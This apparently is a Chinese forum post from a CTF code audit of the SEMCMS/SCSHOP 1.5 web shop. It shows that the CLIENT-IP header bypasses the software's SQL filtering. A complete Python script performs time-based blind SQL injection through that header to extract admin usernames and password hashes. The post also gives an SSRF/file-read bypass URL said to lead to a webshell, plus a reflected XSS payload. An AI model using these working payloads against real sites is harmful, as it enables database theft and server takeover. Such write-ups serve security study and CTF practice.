|
|
原文链接:某cms代码审计
SCSHOP1.5代码审计深育杯的一到题:
源码下载地址https://www.sem-cms.cn/wenda/view-52.html
看一下代码逻辑结构
 
- include_once 'db_con.php'; 数据库配置
- include_once 'Ant_Check.php'; sql注入检测
- include_once 'Ant_Class.php'; 数据操作
- include_once 'Ant_Contrl.php'; 一些函数封装
- include_once 'class.phpmailer.php'; 邮件操作
- include_once 'Ant_Config.php'; 全局设置
- include_once 'Ant_Shop.php'; 商品属性的一些设置函数
发现它只是对GET就行了过滤!
看看有没有其它方式的参数获取!
Core/Program/Ant_Contrl.php 里
GetIp 函数返回ip! 这里我们可控!而且不受过滤!
调用的地方有:
测试:
注入成功
poc- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- # @Time : 2021/11/28 18:28
- # @Author : upload
- # @File : aa.py
- # @Software: PyCharm
- import requests
- proxy = '127.0.0.1:8086'
- proxies = {
- 'http': 'http://' + proxy,
- 'https': 'https://' + proxy,
- }
- url = "http://anxun.com:80/Template/Default/File/search.php"
- cookies = {"XDEBUG_SESSION": "PHPSTORM", "PHPSESSID": "moigehp8edd6g71hltptjjogs4", "UM_distinctid": "17d6e9309a5d7-0e967d747fce92-d7e163f-144000-17d6e9309a6a63", "CNZZDATA1279754351": "673588782-1638237672-null%7C1638237672"}
- headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://anxun.com", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://anxun.com/Template/Default/File/search.php", "CLIENT-IP": "'or sleep(3) or'", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
- data = {"search": "1"}
- print(headers['CLIENT-IP'])
- flag=''
- for i in range(1,100):
- f1=flag
- top=127
- low=33
- while low<=top:
- mid = (top + low) // 2
- print(i,mid)
- payload1 = '\'or if((ord(substr((select(group_concat(user_name,"~",user_ps,"~",user_name))from(sc_user)),{},1))={}),sleep(3),0) or\''.format(i,mid)
- payload2 = '\'or if((ord(substr((select(group_concat(user_name,"~",user_ps,"~",user_name))from(sc_user)),{},1))>{}),sleep(3),0) or\''.format(i,mid)
- headers['CLIENT-IP'] = payload1
- try:
- r1 = requests.post(url, data=data,headers=headers,timeout=2,proxies=proxies)
- print(headers)
- except:
- flag +=chr(mid)
- print(flag)
- break
- else:
- try:
- headers['CLIENT-IP'] = payload2
- r2 = requests.post(url, data=data,headers=headers,timeout=2,proxies=proxies)
- except:
- low = mid + 1
- else:
- top = mid - 1
- if flag == f1:
- break
- print(flag)
解密后 semcms
其它地方的sql注入应该也可以!
后台挖掘有一个任意文件读取!
从远程读取文件!
最后可以保存它
不过要绕过限制:
用
payload:
url=http://sem-cms.cn@0.0.0.0/index.php
成功写入:
getshell
xss反射型
http://anxun.com/r20A88_A2M/Ant_ ... p;aed=a&sortID="<script>alert('XSS')</script>"
|
|
发表于 2021-12-9 14:44:11